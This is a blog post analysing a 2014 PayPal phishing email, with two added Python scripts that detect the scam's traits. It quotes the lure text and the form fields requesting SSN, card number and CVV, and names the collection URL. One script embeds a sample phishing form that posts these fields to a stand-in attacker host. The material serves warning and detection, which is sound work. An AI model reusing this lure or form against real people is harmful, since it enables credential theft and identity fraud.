Beware of emails containing a PayPal Phishing scam attachment
February 20, 2014
Today, I received a suspicious email claiming to come from PayPal, with the subject "Account Notification," notifying me that I had to verify my account information because of a "planned system upgrade." As I suspected, it was a phishing scam, meant to steal not only your PayPal credentials but also your identity.
Here are the most important identifying features of this email scam.
PayPal Phishing Scam Email Contents
Received: from mail.xx11.com.br ([177.8.168.7])
by imta24.westchester.pa.mail.comcast.net with comcast
id UhP31n00w09uhKl0QhP56C; Thu, 20 Feb 2014 17:23:09 +0000
From: PayPal ([email protected])
Return-Path: [email protected]
Subject: Account Notification
Message body contents (text only):
PayPal Account System Upgrade Verification. Technical services of the PayPal Inc. are carrying out a planned system upgrade. We earnestly ask you to start with the procedure of confirmation on customers data.
This email has been sent to all PayPal customers, and we ask a few minutes of your online experience. We have sent you an attachment form through this email. Please download and open it in your web browser.
Your personal information is protected by state-of-the-art technology. After you have filled in all the required fields in the form, our verification system will automatically update your account records.
We apologize for any inconvenience, and thank you for your time.
Please do not reply to this email. This mailbox is not monitored and you will not receive a response. For assistance, log in to your PayPal account and click Help in the top right corner of any PayPal page.
Copyright © 1999-2014 PayPal. All rights reserved.
My analysis follows.
The first thing an astute PayPal customer should look for in any email communication from the company is a "salutation" containing their own legal name, or whatever name they used to register their PayPal account (Dear _, Attention _, etc.). This email has no salutation whatsoever!
The next giveaway is the email address in the From field. Although the word "PayPal" is displayed, the actual email address next to it is not even spoofed to read @paypal.com. Rather, the scammers have borrowed an innocent third party's email account and inserted it into both the Return-Path and From fields. This causes bounces and angry replies to go to the person or company whose account was spoofed. We call this a "Joe Job" in spam-fighter-speak.
Those of you who know how to display the incoming headers of email messages would have noticed that the sender was a Comcast customer in Westchester, Pa, who relayed it from a mail server in Brazil. To wit:
"Received: from imta24.westchester.pa.mail.comcast.net (LHLO imta24.westchester.pa.mail.comcast.net)"
"Received: from mail.xx11.com.br ([177.8.168.7])"
The next suspicious item is this sentence: "We have sent you an attachment form through this email. Please download and open it in your web browser." PayPal doesn't do that. If you must fill out a form or update any information, they tell you to log into your PayPal account and go to this or that section and download or update it from the official PayPal website.
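The three checks described above (a brand name in the From display name paired with an address at some other domain, a missing salutation, and a body that asks you to open an attached form) can be automated. The script below is an added example for this article, not something from the original post; the message it parses is a constructed stand-in modelled on the headers quoted above, and "someone@example.net" is a placeholder for the hijacked third-party address, which the article redacts.

```python
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed sample modelled on the headers quoted in the article.
# The sender address is a placeholder; the real one was a hijacked
# third-party account and is redacted in the article.
RAW_MESSAGE = """\
Received: from mail.xx11.com.br ([177.8.168.7])
    by imta24.westchester.pa.mail.comcast.net with comcast
    id UhP31n00w09uhKl0QhP56C; Thu, 20 Feb 2014 17:23:09 +0000
From: PayPal <someone@example.net>
Return-Path: <someone@example.net>
Subject: Account Notification
Content-Type: text/plain

PayPal Account System Upgrade Verification. Technical services of the
PayPal Inc. are carrying out a planned system upgrade.
We have sent you an attachment form through this email. Please download
and open it in your web browser.
"""

BRAND = "PayPal"
LEGITIMATE_DOMAINS = {"paypal.com"}
# Phrases that a genuine PayPal notice would not use (assumed wording list).
ATTACHMENT_LURES = ("attachment form", "open it in your web browser")


def parse(raw):
    """Parse a raw RFC 5322 message into an EmailMessage."""
    return email.message_from_string(raw, policy=policy.default)


def sender_domain(msg):
    """Return the domain part of the From address, lower-cased, or ''."""
    _display, addr = parseaddr(msg.get("From", ""))
    return addr.rpartition("@")[2].lower()


def received_chain(msg):
    """Walk the Received headers top-down and extract (from_host, ip, by_host).
    Headers are added at the top as the message travels, so the last tuple
    is the oldest hop, i.e. where the message entered the mail system."""
    hops = []
    for hdr in msg.get_all("Received", []):
        flat = " ".join(str(hdr).split())          # collapse header folding
        m = re.match(r"from (\S+) \(\[?([\d.]+)\]?\) by (\S+)", flat)
        if m:
            hops.append(m.groups())
    return hops


def check_message(raw):
    """Return a list of human-readable phishing indicators found in the message."""
    msg = parse(raw)
    findings = []

    display, _addr = parseaddr(msg.get("From", ""))
    dom = sender_domain(msg)
    if BRAND.lower() in display.lower() and dom not in LEGITIMATE_DOMAINS:
        findings.append(f"display name '{display}' but sender domain is {dom!r}")

    body = msg.get_body(preferencelist=("plain",)).get_content()
    if not re.search(r"^\s*(Dear|Hello|Attention)\b", body, re.M):
        findings.append("no personalised salutation")
    if any(lure in body.lower() for lure in ATTACHMENT_LURES):
        findings.append("asks recipient to open an attached form in a browser")

    hops = received_chain(msg)
    if hops:
        origin_host, origin_ip, relay = hops[-1]
        findings.append(f"origin {origin_host} [{origin_ip}] relayed via {relay}")
    return findings


if __name__ == "__main__":
    for line in check_message(RAW_MESSAGE):
        print("-", line)
```

The salutation test is deliberately crude (it only looks for a greeting word at the start of a line); in a real mail filter it belongs alongside SPF/DKIM results rather than replacing them, since a scammer can add "Dear Customer" more easily than they can pass authentication for paypal.com.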
Now, about that attached form...
The attached file is a full-fledged html document, complete with images stolen from various PayPal servers. When opened in a browser it closely resembles an official PayPal page. Along the top is a section of button-like links, starting with "My Account," all of which do nothing if clicked. There are however a few scattered actual links to various PayPal pages, just to throw you off balance.
The call to action in this fraud begins under the bold heading "Profile Update," where we find this threatening sentence: "Please complete the form below to update your Profile information and restore your account access." This is meant to get recipients to begin filling in the requested (and "required") details that follow, for fear of losing access to their PayPal accounts.
So, what information do they want you to update? Look no farther than the input fields under "Personal Information Profile." Here we find everything needed for identity theft:
Card Holder Name:
Date of Birth:
Mother's Maiden Name:
Social Security Number:
Home Phone Number:
Address Line 1:
Address Line 2:
City:
State:
Zip Code:
Country:
Card Number:
Expiration Date:
Card Verification Number:
At the bottom right of the form is a gold-colored button labeled "Save Profile." That is the "submit" button that sends all of your personally identifiable information, along with your PayPal credit/debit card details and CVV code, to a domain registered in The Soviet Union. (form name="frm" action="h**p://www.informed.su/Verified.php")
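The two things that give this attachment away, a form whose action points at a domain the brand does not own and a set of input fields no legitimate profile page would ask for together, can be checked without opening the file in a browser. The following is an added example written for this article, not code from the original post: it parses a constructed HTML attachment modelled on the one described above, and the "phishing-kit.example" domain and the field names are placeholders, not the real kit's values.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed HTML attachment modelled on the one described in the article.
# "phishing-kit.example" stands in for the real drop domain; the input names
# are assumed, since the article only shows the field labels.
ATTACHMENT_HTML = """
<html><body>
<a href="#">My Account</a> <a href="#">Send Money</a>
<a href="https://www.paypal.com/help">Help</a>
<h2>Profile Update</h2>
<form name="frm" action="http://phishing-kit.example/Verified.php" method="post">
  Card Holder Name: <input name="holder">
  Date of Birth: <input name="dob">
  Mother's Maiden Name: <input name="mmn">
  Social Security Number: <input name="ssn">
  Card Number: <input name="cardnumber">
  Expiration Date: <input name="exp">
  Card Verification Number: <input name="cvv">
  <input type="submit" value="Save Profile">
</form>
</body></html>
"""

TRUSTED_DOMAINS = {"paypal.com"}
# Input names that, requested together, indicate identity theft (assumed list).
SENSITIVE_FIELDS = {"ssn", "mmn", "dob", "cardnumber", "cvv", "password"}


class FormAuditor(HTMLParser):
    """Collect every form, its action URL and its visible inputs, plus links."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "inputs": [names]}
        self.links = []        # hrefs that actually go somewhere
        self.dead_links = 0    # decorative links with no destination
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() not in ("submit", "hidden", "image"):
                self._current["inputs"].append(a.get("name") or "")
        elif tag == "a":
            href = a.get("href") or ""
            if href in ("", "#"):
                self.dead_links += 1
            else:
                self.links.append(href)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def domain_of(url):
    return (urlparse(url).hostname or "").lower()


def is_trusted(host):
    """True only for the brand's own domain or a subdomain of it."""
    return host in TRUSTED_DOMAINS or any(host.endswith("." + d) for d in TRUSTED_DOMAINS)


def audit_attachment(html):
    """Return a list of findings describing why the attachment is a credential trap."""
    p = FormAuditor()
    p.feed(html)
    report = []
    external_form = False
    for form in p.forms:
        host = domain_of(form["action"])
        if not is_trusted(host):
            external_form = True
            report.append(f"form posts to untrusted host {host!r}")
        sensitive = sorted(set(form["inputs"]) & SENSITIVE_FIELDS)
        if sensitive:
            report.append("form requests sensitive fields: " + ", ".join(sensitive))
    if p.dead_links:
        report.append(f"{p.dead_links} decorative links with no destination")
    decoys = [l for l in p.links if is_trusted(domain_of(l))]
    if decoys and external_form:
        report.append(f"{len(decoys)} genuine-looking link(s) to the brand alongside an external form")
    return report


if __name__ == "__main__":
    for line in audit_attachment(ATTACHMENT_HTML):
        print("-", line)
```

The trust check compares the form's host against the brand's registered domain and its subdomains only, so a look-alike such as "paypal.com.something.example" is still reported as untrusted; the genuine PayPal links sprinkled through the page are counted separately, because on their own they prove nothing.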
I'll bet you thought that the Soviet Union was long gone. As a political entity, yes. As a legal web domain name, no. Read this:
What is .su?
.su was assigned as the country code top-level domain for the Soviet Union on September 19, 1990. It remains in use today, even though the Soviet Union itself no longer exists, and is administered by the Russian Institute for Public Networks (RIPN, or RosNIIROS in Russian transcription).
(snip)
In the Soviet Union the official language is Russian.
As I finished this article, I discovered that the domain "informed.su" has been deactivated, following SpamCop reports from me and other spam fighters (You tried to visit informed.su, which is not loading.).
I pray that none of my readers fell victim to this phishing scam. If you have, please log into your PayPal account and change the password and request a new credit/debit card. You might also want to start monitoring your credit reports for attempts to open new accounts from abroad.
If you like this article please share it.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.